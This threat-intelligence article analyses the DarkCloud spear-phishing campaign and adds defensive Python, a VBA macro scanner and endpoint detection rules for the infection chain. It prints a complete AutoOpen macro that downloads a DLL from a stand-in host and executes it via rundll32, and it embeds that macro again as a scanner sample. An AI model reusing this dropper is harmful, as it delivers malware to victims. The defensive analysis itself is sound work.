A newly observed spear-phishing campaign is leveraging sophisticated social engineering lures to distribute DarkCloud, a modular malware suite designed to harvest keystrokes, exfiltrate FTP credentials and gather system information.
Over the past month, targeted emails masquerading as legitimate software updates or corporate invoices have reached unsuspecting recipients across various industries.
These messages carry a weaponized Microsoft Word attachment that, when opened, triggers a multi-stage infection chain.
Initial reconnaissance indicates that threat actors behind the campaign have invested considerable effort into crafting believable messages, demonstrating a high level of operational security and tradecraft.
Shortly after the victim enables macros in the document, a hidden Visual Basic for Applications (VBA) script executes, reaching out to a command-and-control (C2) server to download the next-stage payload.
This payload, the DarkCloud loader, is capable of unpacking additional modules directly into memory, evading disk-based detection and complicating forensic analysis.
Analysts note that the loader checks for virtual machine artifacts and sandboxing environments, delaying execution or aborting if analysis tools are detected.
eSentire researchers identified DarkCloud’s core keylogging component within hours of the campaign’s initial detection.
They observed the malware injecting a dynamic-link library into common processes such as explorer.exe and svchost.exe, establishing hooks on keystroke APIs to capture user input.
This approach ensures that every typed character—including credentials entered into web-based FTP clients—can be intercepted.
The harvested data is then encrypted with a custom XOR-based algorithm and sent to the C2 infrastructure under the guise of legitimate HTTPS traffic, blending in with normal network flows.
Aside from credential theft, DarkCloud exhibits advanced reconnaissance capabilities. It gathers system information—such as running processes, installed software, and open network connections—and transmits this metadata back to the attackers.
This enrichment allows the operators to tailor subsequent modules, such as a remote file exfiltration plugin or a screen-capture component, to the victim’s environment.
Throughout the campaign, the threat actors pivot between modules to maximize data collection while minimizing forensic footprints.
Infection Mechanism and Loader Dynamics
The infection sequence begins with a lure document containing an obfuscated VBA macro. Upon activation, the macro executes the following sequence (the sample as reported, annotated stage by stage):

```vba
' Runs automatically as soon as the document is opened with macros enabled
Sub AutoOpen()
    ' Stage 1: fetch the loader from the C2 server over HTTPS
    Dim xmlHttp As Object
    Set xmlHttp = CreateObject("MSXML2.XMLHTTP")
    xmlHttp.Open "GET", "https://malicious.example.com/loader.bin", False
    xmlHttp.send

    ' Stage 2: write the downloaded bytes to the user's temp directory as a DLL
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    Dim tempPath As String
    tempPath = Environ("TEMP") & "dcl.dll"
    With CreateObject("ADODB.Stream")
        .Type = 1                    ' binary stream
        .Open
        .Write xmlHttp.responseBody
        .SaveToFile tempPath, 2      ' 2 = overwrite if the file exists
        .Close
    End With

    ' Stage 3: execute the dropped DLL through the signed system binary rundll32.exe
    shell.Run "rundll32.exe " & tempPath & ",EntryPoint"
End Sub
```
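The download-write-execute chain above leaves a recognisable fingerprint in the macro source, which is what a defender can triage before a document ever reaches a user. The following scanner is an added example, not code from the article or from eSentire: it takes extracted VBA text (for instance the output of a macro extraction tool such as olevba) and flags the indicators that make up this chain. The weights, the thresholds and the two embedded VBA samples are constructed for illustration.

```python
import re

# Constructed sample (not taken from a real document): the VBA text an extraction tool would hand us.
# It reproduces the stages the article describes and is only ever treated as text here.
SAMPLE_VBA = '''Sub AutoOpen()
    Dim xmlHttp As Object
    Set xmlHttp = CreateObject("MSXML2.XMLHTTP")
    xmlHttp.Open "GET", "https://malicious.example.com/loader.bin", False
    xmlHttp.send
    Set shell = CreateObject("WScript.Shell")
    tempPath = Environ("TEMP") & "dcl.dll"
    With CreateObject("ADODB.Stream")
        .Type = 1
        .Open
        .Write xmlHttp.responseBody
        .SaveToFile tempPath, 2
        .Close
    End With
    shell.Run "rundll32.exe " & tempPath & ",EntryPoint"
End Sub
'''

# Constructed benign macro for comparison: formats a document, touches no network or filesystem.
BENIGN_VBA = '''Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

# (name, pattern, weight). Weights are a constructed triage heuristic, not a vendor score.
INDICATORS = [
    ("auto_exec",     re.compile(r"\bSub\s+(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b", re.I), 2),
    ("http_client",   re.compile(r'CreateObject\(\s*"(MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest)', re.I), 3),
    ("binary_stream", re.compile(r'CreateObject\(\s*"ADODB\.Stream"', re.I), 2),
    ("save_to_file",  re.compile(r"\.SaveToFile\b", re.I), 2),
    ("shell_object",  re.compile(r'CreateObject\(\s*"WScript\.Shell"', re.I), 2),
    ("rundll32",      re.compile(r"\brundll32(\.exe)?\b", re.I), 3),
    ("temp_dir",      re.compile(r'Environ\(\s*"TEMP"', re.I), 1),
    ("url",           URL_RE, 2),
]


def extract_urls(vba_source):
    """Return every URL literal in the macro text; these are candidate C2 indicators to block."""
    return URL_RE.findall(vba_source)


def scan_macro(vba_source):
    """Score a macro by the indicators it contains and return a triage verdict."""
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(vba_source)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    # Download + write-to-disk + launch in a single macro is the chain described above;
    # its presence is treated as malicious regardless of the numeric score.
    chain = {"http_client", "save_to_file"}.issubset(hits) and bool({"rundll32", "shell_object"} & set(hits))
    if chain or score >= 8:
        verdict = "malicious"
    elif score >= 4:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"score": score, "hits": hits, "urls": extract_urls(vba_source), "verdict": verdict}


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(label, scan_macro(src))
```

Run against the constructed sample the scanner reports every indicator, a score of 17 and the C2 URL to block; the benign macro scores 0. The chain rule matters more than the score: a macro that downloads, writes and executes is malicious even if an attacker strips the easy-to-spot names, so in practice this sits in front of sandbox detonation rather than replacing it.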
Once dcl.dll is loaded, it unpacks additional modules in memory. The loader uses a custom “chunked XOR” routine to decrypt embedded payloads, so the decrypted executables are never written to disk.
This memory-resident design allows DarkCloud to maintain persistence via a registry run key, while its modular architecture supports on-demand deployment of new capabilities.
By combining a convincing spear-phishing vector with a stealthy, in-memory loader and modular plugins, DarkCloud poses a significant threat to organizations that rely on FTP-based file transfers and unified endpoint protection solutions.
Security teams should monitor abnormal HTTPS sessions to unknown hosts and employ behavioral analysis tools capable of detecting API hook injections. Continuous threat intelligence sharing and rapid incident response will be critical to mitigating DarkCloud’s evolving tactics.
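The behaviours described in this article (rundll32.exe launched by Word with a DLL from the temp directory, and a Run key pointing at that same DLL for persistence) are cheap to detect from endpoint telemetry. The rules below are an added example written for this article, not code from eSentire or any vendor product: they run over constructed process-creation and registry events with assumed field names (`image`, `cmdline`, `parent`, `key`, `value`) modelled on what a Sysmon or EDR feed exposes, and the paths in the events are made up.

```python
import re

# Office applications that should never be the parent of rundll32.exe in normal operation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Directories a standard user can write to; a DLL loaded from here by a system binary is suspect.
USER_WRITABLE = re.compile(r"\\(Temp|AppData\\Local\\Temp|Downloads|Public)\\", re.I)
# HKCU/HKLM ...\CurrentVersion\Run and RunOnce, the persistence location named in the article.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)

# Constructed telemetry: two process-creation events and two registry-set events.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\dcl.dll,EntryPoint",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL",   # benign: Control Panel applet
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\dcl.dll,EntryPoint",
     "image": r"C:\Windows\System32\rundll32.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VendorSync",
     "value": r'"C:\Program Files\Vendor\Sync.exe" /background',        # benign autostart
     "image": r"C:\Program Files\Vendor\Setup.exe"},
]


def basename(path):
    """Lower-cased final component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names an event trips; an empty list means no finding."""
    findings = []
    if event["type"] == "process" and basename(event["image"]) == "rundll32.exe":
        if basename(event["parent"]) in OFFICE_PARENTS:
            findings.append("rundll32 spawned by an Office application")
        if USER_WRITABLE.search(event["cmdline"]) and re.search(r"\.dll\b", event["cmdline"], re.I):
            findings.append("rundll32 loading a DLL from a user-writable directory")
    elif event["type"] == "registry" and RUN_KEY.search(event["key"]):
        value = event["value"]
        if "rundll32" in value.lower() and USER_WRITABLE.search(value):
            findings.append("Run-key persistence via rundll32 and a temp-directory DLL")
    return findings


def triage(events):
    """Evaluate every event and keep only those with findings, indexed by position in the feed."""
    alerts = []
    for index, event in enumerate(events):
        findings = evaluate(event)
        if findings:
            alerts.append({"event": index, "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```

On the constructed feed, event 0 trips both process rules and event 2 trips the persistence rule, while the Control Panel launch and the vendor autostart produce nothing. Correlating the two hits on the same DLL path is what turns two medium-severity alerts into one high-confidence incident, and the DLL path itself is the artifact to collect before the in-memory modules are lost to a reboot.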